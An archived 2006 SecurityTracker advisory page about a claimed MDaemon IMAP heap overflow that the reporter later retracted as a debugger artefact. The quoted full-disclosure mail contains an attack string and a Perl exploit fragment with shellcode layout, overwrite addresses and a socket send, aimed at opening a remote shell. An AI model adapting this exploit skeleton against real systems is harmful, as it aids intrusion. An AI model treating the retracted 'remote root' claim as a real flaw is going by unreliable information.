SecurityTracker.com Archives - [Not a Vulnerability] MDaemon Heap Overflow in IMAP Service Lets Remote Authenticated Users Execute Arbitrary Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (E-mail Server) > MDaemon (Alt-N)

Vendors: Alt-N Technologies

[Not a Vulnerability] MDaemon Heap Overflow in IMAP Service Lets Remote Authenticated Users Execute Arbitrary Code

SecurityTracker Alert ID: 1016167

SecurityTracker URL: http://securitytracker.com/id?1016167

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Updated: Jun 7 2006

Original Entry Date: May 28 2006

Impact: Execution of arbitrary code via network, User access via network

Version(s): 9.0.1; possibly other versions

Description: A vulnerability was reported in MDaemon. A remote authenticated user can execute arbitrary code on the target system. [Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]

A remote authenticated user can send specially crafted data to the IMAP service to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service.

A demonstration exploit command is provided:

a001 "[99555 characters]\r\n

kcope discovered this vulnerability.

[Editor's note: kcope has retracted the vulnerability report. The original vulnerable behavior that was observed was introduced by the debugger used to monitor the process. Without the debugger, there is no vulnerability.]

Impact: No impact.

[Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]

Solution: [Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]

Vendor URL: www.altn.com/ (Links to External Site)

Cause: Boundary error

Underlying OS: Windows (Any)

Reported By: kcope <kingcope@gmx.net>

Message History: None.

Source Message Contents

Date: Sun, 28 May 2006 15:24:30 +0200
From: kcope <kingcope@gmx.net>
Subject: [Full-disclosure] *zeroday warez* MDAEMON LATEST VERSION PREAUTH

 
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*

zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
a001 "[X]\r\n
Look specifically at the " it is important :)
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the 
PEB Lock) :)

Sample code:
 $where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
 #$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
 $what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
 
 $nops = "A" x 100;
 $a = $nops . $shellcode . ("Z" x 
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x 
(0x184AC - 0x200A - 12));
 print $sock "a001 \"$a\r\n";
 close($sock);

Best Regards,
kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2006, SecurityGlobal.net LLC